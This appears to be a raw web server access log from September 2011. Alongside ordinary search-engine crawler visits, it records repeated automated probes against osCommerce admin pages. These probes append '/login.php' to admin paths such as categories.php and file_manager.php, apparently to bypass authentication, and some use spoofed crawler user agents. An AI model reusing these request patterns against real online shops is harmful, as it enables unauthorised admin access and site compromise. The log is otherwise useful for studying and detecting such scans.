77.79.245.90 - - [15/Sep/2011:04:10:00 +0000] "GET /Account/access_log.txt/admin/categories.php/login.php HTTP/1.1" 404 368 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1;en-US;rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
77.79.245.90 - - [15/Sep/2011:04:10:01 +0000] "GET /admin/categories.php/login.php HTTP/1.1" 404 345 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1;en-US;rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
77.79.245.90 - - [15/Sep/2011:04:10:01 +0000] "GET /Account/admin/categories.php/login.php HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1;en-US;rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
77.79.245.90 - - [15/Sep/2011:04:10:01 +0000] "GET /Account/access_log.txt/admin/file_manager.php/login.php HTTP/1.1" 404 370 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1;en-US;rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
77.79.245.90 - - [15/Sep/2011:04:10:01 +0000] "GET /admin/file_manager.php/login.php HTTP/1.1" 404 347 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1;en-US;rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
77.79.245.90 - - [15/Sep/2011:04:10:02 +0000] "GET /Account/admin/file_manager.php/login.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1;en-US;rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
77.79.245.90 - - [15/Sep/2011:04:10:02 +0000] "GET /Account/access_log.txt/admin/banner_manager.php/login.php HTTP/1.1" 404 372 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1;en-US;rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
77.79.245.90 - - [15/Sep/2011:04:10:03 +0000] "GET /admin/banner_manager.php/login.php HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1;en-US;rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
77.79.245.90 - - [15/Sep/2011:04:10:03 +0000] "GET /Account/admin/banner_manager.php/login.php HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1;en-US;rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
77.79.245.90 - - [15/Sep/2011:04:10:07 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','50','8','%2A.php%3FcPath%3D15++hu','',%20'00bdd93f9e61ea3ba479fc1d7346fa8658a1d7884b49af0123f4',%200)/admin/file_manager.php/login.php HTTP/1.1" 404 552 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1;en-US;rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
77.79.245.90 - - [15/Sep/2011:04:10:07 +0000] "GET /admin/file_manager.php/login.php HTTP/1.1" 404 347 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1;en-US;rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
77.79.245.90 - - [15/Sep/2011:04:10:07 +0000] "GET /Account/admin/file_manager.php/login.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1;en-US;rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
77.79.245.90 - - [15/Sep/2011:04:10:09 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','50','8','%2A.php%3FcPath%3D15++hu','',%20'00f8ad9c2c61ea3ba479fc1d7346fa8658a1d7884b0cdba29049',%200)/admin/banner_manager.php/login.php HTTP/1.1" 404 554 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1;en-US;rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
77.79.245.90 - - [15/Sep/2011:04:10:09 +0000] "GET /admin/banner_manager.php/login.php HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1;en-US;rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
77.79.245.90 - - [15/Sep/2011:04:10:10 +0000] "GET /Account/admin/banner_manager.php/login.php HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1;en-US;rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
77.79.245.90 - - [15/Sep/2011:04:10:17 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','50','8','%2A.php%3FcPath%3D15++hu','',%20'00a6b03b8b61ea3ba479fc1d7346fa8658a1d7884b52c6053686',%200)/admin/categories.php/login.php HTTP/1.1" 404 550 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1;en-US;rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
77.79.245.90 - - [15/Sep/2011:04:10:17 +0000] "GET /admin/categories.php/login.php HTTP/1.1" 404 345 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1;en-US;rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
77.79.245.90 - - [15/Sep/2011:04:10:18 +0000] "GET /Account/admin/categories.php/login.php HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1;en-US;rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
207.218.231.66 - - [15/Sep/2011:04:13:55 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.831"
207.218.231.66 - - [15/Sep/2011:04:13:55 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.831"
91.121.28.191 - - [15/Sep/2011:04:14:28 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:04:14:28 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:04:14:36 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:04:14:36 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.803"
95.108.240.251 - - [15/Sep/2011:04:52:51 +0000] "GET /?C=N;O=D HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
207.218.231.66 - - [15/Sep/2011:05:19:22 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.831"
207.218.231.66 - - [15/Sep/2011:05:19:22 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.831"
91.121.28.191 - - [15/Sep/2011:05:20:01 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:05:20:01 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:05:20:08 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:05:20:08 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.803"
91.201.153.36 - - [15/Sep/2011:06:03:38 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','50','8','%2A.php%3FcPath%3D15++hu','',%20'009af1306c61ea3ba479fc1d7346fa8658a1d7884b6e87146d96',%200)/admin/file_manager.php/login.php HTTP/1.1" 404 552 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
91.201.153.36 - - [15/Sep/2011:06:03:39 +0000] "GET /admin/file_manager.php/login.php HTTP/1.1" 404 347 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
91.201.153.36 - - [15/Sep/2011:06:03:39 +0000] "GET /Account/admin/file_manager.php/login.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
91.201.153.36 - - [15/Sep/2011:06:03:39 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','50','8','%2A.php%3FcPath%3D15++hu','',%20'00faaa32ec61ea3ba479fc1d7346fa8658a1d7884b0edc16eea3',%200)/admin/banner_manager.php/login.php HTTP/1.1" 404 554 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
91.201.153.36 - - [15/Sep/2011:06:03:40 +0000] "GET /admin/banner_manager.php/login.php HTTP/1.1" 404 349 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
91.201.153.36 - - [15/Sep/2011:06:03:40 +0000] "GET /Account/admin/banner_manager.php/login.php HTTP/1.1" 404 357 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
91.201.153.36 - - [15/Sep/2011:06:03:41 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','50','8','%2A.php%3FcPath%3D15++hu','',%20'00fc76164e61ea3ba479fc1d7346fa8658a1d7884b0800324c5a',%200)/admin/categories.php/login.php HTTP/1.1" 404 550 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
91.201.153.36 - - [15/Sep/2011:06:03:41 +0000] "GET /admin/categories.php/login.php HTTP/1.1" 404 345 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
91.201.153.36 - - [15/Sep/2011:06:03:41 +0000] "GET /Account/admin/categories.php/login.php HTTP/1.1" 404 353 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
61.135.249.233 - - [15/Sep/2011:06:27:54 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )"
67.195.115.166 - - [15/Sep/2011:06:49:29 +0000] "GET /robots.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.115.166 - - [15/Sep/2011:06:49:29 +0000] "GET /?C=M;O=D HTTP/1.0" 200 749 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
180.76.5.165 - - [15/Sep/2011:07:04:25 +0000] "GET /?C=N;O=D HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
91.121.28.191 - - [15/Sep/2011:08:17:05 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:08:17:05 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:08:17:06 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:08:17:06 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.803"
180.76.5.13 - - [15/Sep/2011:08:55:57 +0000] "GET /Account/?C=S;O=D HTTP/1.1" 200 927 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
123.125.71.77 - - [15/Sep/2011:09:07:40 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
61.135.249.12 - - [15/Sep/2011:09:10:15 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )"
91.121.28.191 - - [15/Sep/2011:09:36:02 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:09:36:03 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:09:36:08 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:09:36:08 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:10:26:24 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:10:26:24 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:10:26:27 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:10:26:27 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.803"
180.76.5.55 - - [15/Sep/2011:10:48:59 +0000] "GET /Account/access_log.txt HTTP/1.1" 200 436151 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
95.108.158.245 - - [15/Sep/2011:10:55:43 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)"
91.121.28.191 - - [15/Sep/2011:11:23:51 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:11:23:52 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:11:23:56 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:11:23:56 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.803"
61.135.248.205 - - [15/Sep/2011:11:40:50 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )"
193.47.80.51 - - [15/Sep/2011:12:00:08 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
193.47.80.51 - - [15/Sep/2011:12:00:09 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
77.223.154.18 - - [15/Sep/2011:12:51:12 +0000] "GET /Account/admin/categories.php/login.php HTTP/1.1" 404 353 "-" "IlTrovatore-Setaccio/1.2 (http://www.iltrovatore.it/aiuto/faq.html)"
77.223.154.18 - - [15/Sep/2011:12:51:12 +0000] "GET /admin/categories.php/login.php HTTP/1.1" 404 345 "-" "IlTrovatore-Setaccio/1.2 (http://www.iltrovatore.it/aiuto/faq.html)"
77.223.154.18 - - [15/Sep/2011:12:51:12 +0000] "GET /Account/admin/file_manager.php/login.php HTTP/1.1" 404 355 "-" "IlTrovatore-Setaccio/1.2 (http://www.iltrovatore.it/aiuto/faq.html)"
77.223.154.18 - - [15/Sep/2011:12:51:12 +0000] "GET /admin/file_manager.php/login.php HTTP/1.1" 404 347 "-" "IlTrovatore-Setaccio/1.2 (http://www.iltrovatore.it/aiuto/faq.html)"
77.223.154.18 - - [15/Sep/2011:12:51:13 +0000] "GET /Account/admin/banner_manager.php/login.php HTTP/1.1" 404 357 "-" "IlTrovatore-Setaccio/1.2 (http://www.iltrovatore.it/aiuto/faq.html)"
77.223.154.18 - - [15/Sep/2011:12:51:13 +0000] "GET /admin/banner_manager.php/login.php HTTP/1.1" 404 349 "-" "IlTrovatore-Setaccio/1.2 (http://www.iltrovatore.it/aiuto/faq.html)"
180.76.5.22 - - [15/Sep/2011:13:31:47 +0000] "GET /?C=N;O=A HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
61.135.249.132 - - [15/Sep/2011:14:14:10 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )"
65.52.104.89 - - [15/Sep/2011:14:18:06 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.52.104.89 - - [15/Sep/2011:14:19:06 +0000] "GET /Account/access_log.txt HTTP/1.1" 200 439206 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
91.121.28.191 - - [15/Sep/2011:14:51:37 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:14:51:37 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:14:51:45 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:14:51:45 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.803"
168.96.204.37 - - [15/Sep/2011:15:17:04 +0000] "GET /Account/admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 353 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
168.96.204.37 - - [15/Sep/2011:15:17:04 +0000] "GET /admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
168.96.204.37 - - [15/Sep/2011:15:17:05 +0000] "GET /Account/admin/file_manager.php/login.php HTTP/1.1" 404 355 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
168.96.204.37 - - [15/Sep/2011:15:17:05 +0000] "GET /admin/file_manager.php/login.php HTTP/1.1" 404 347 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
95.108.158.245 - - [15/Sep/2011:15:21:43 +0000] "GET /icons/folder.gif HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)"
180.76.5.144 - - [15/Sep/2011:15:24:48 +0000] "GET /?C=S;O=A HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
208.80.194.33 - - [15/Sep/2011:15:49:22 +0000] "GET / HTTP/1.0" 200 749 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; QS 4.1.2.2; FunWebProducts; .NET CLR 1.1.4322)"
123.125.71.52 - - [15/Sep/2011:16:49:50 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
61.135.248.208 - - [15/Sep/2011:16:52:31 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )"
180.76.5.24 - - [15/Sep/2011:17:17:37 +0000] "GET /Account/?C=S;O=A HTTP/1.1" 200 927 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
180.76.5.164 - - [15/Sep/2011:17:31:02 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
91.121.28.191 - - [15/Sep/2011:18:42:43 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:18:42:43 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:18:42:51 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:18:42:51 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:18:56:36 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:18:56:36 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:18:56:41 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:18:56:41 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:18:56:51 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:18:56:52 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.803"
213.198.35.81 - - [15/Sep/2011:18:59:38 +0000] "GET /Account/access_log.txt/admin/categories.php/login.php HTTP/1.1" 404 368 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16"
213.198.35.81 - - [15/Sep/2011:18:59:38 +0000] "GET /Account/access_log.txt/admin/file_manager.php/login.php HTTP/1.1" 404 370 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16"
213.198.35.81 - - [15/Sep/2011:18:59:38 +0000] "GET /Account/access_log.txt/admin/banner_manager.php/login.php HTTP/1.1" 404 372 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16"
213.198.35.81 - - [15/Sep/2011:18:59:39 +0000] "GET /admin/categories.php/login.php HTTP/1.1" 404 345 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16"
213.198.35.81 - - [15/Sep/2011:18:59:39 +0000] "GET /admin/file_manager.php/login.php HTTP/1.1" 404 347 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16"
213.198.35.81 - - [15/Sep/2011:18:59:39 +0000] "GET /admin/banner_manager.php/login.php HTTP/1.1" 404 349 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16"
213.198.35.81 - - [15/Sep/2011:18:59:39 +0000] "GET /Account/admin/file_manager.php/login.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16"
213.198.35.81 - - [15/Sep/2011:18:59:39 +0000] "GET /Account/admin/banner_manager.php/login.php HTTP/1.1" 404 357 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16"
213.198.35.81 - - [15/Sep/2011:18:59:39 +0000] "GET /Account/admin/categories.php/login.php HTTP/1.1" 404 353 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16"
67.195.115.166 - - [15/Sep/2011:19:39:40 +0000] "GET /robots.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.115.166 - - [15/Sep/2011:19:39:41 +0000] "GET /Account/?C=N;O=D HTTP/1.0" 200 927 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.115.166 - - [15/Sep/2011:20:04:59 +0000] "GET /?C=D;O=A HTTP/1.0" 200 749 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
178.154.182.65 - - [15/Sep/2011:22:55:15 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
67.195.115.166 - - [15/Sep/2011:23:16:37 +0000] "GET /Account/?C=S;O=A HTTP/1.0" 200 927 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
81.52.143.32 - - [16/Sep/2011:00:01:30 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
81.52.143.32 - - [16/Sep/2011:00:01:41 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
65.52.104.89 - - [16/Sep/2011:00:28:02 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.52.104.89 - - [16/Sep/2011:00:28:41 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
67.195.115.166 - - [16/Sep/2011:00:37:31 +0000] "GET /Account/?C=S;O=D HTTP/1.0" 200 927 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
190.123.192.111 - - [16/Sep/2011:00:54:07 +0000] "GET /Account/admin/categories.php/login.php HTTP/1.1" 404 353 "-" "Mozilla/5.0 (compatible;bingbot/2.0;+http://www.bing.com/bingbot.htm)"
190.123.192.111 - - [16/Sep/2011:00:54:07 +0000] "GET /Account/admin/file_manager.php/login.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (compatible;bingbot/2.0;+http://www.bing.com/bingbot.htm)"
190.123.192.111 - - [16/Sep/2011:00:54:07 +0000] "GET /admin/categories.php/login.php HTTP/1.1" 404 345 "-" "Mozilla/5.0 (compatible;bingbot/2.0;+http://www.bing.com/bingbot.htm)"
190.123.192.111 - - [16/Sep/2011:00:54:07 +0000] "GET /admin/file_manager.php/login.php HTTP/1.1" 404 347 "-" "Mozilla/5.0 (compatible;bingbot/2.0;+http://www.bing.com/bingbot.htm)"
190.123.192.111 - - [16/Sep/2011:00:54:08 +0000] "GET /Account/admin/banner_manager.php/login.php HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible;bingbot/2.0;+http://www.bing.com/bingbot.htm)"
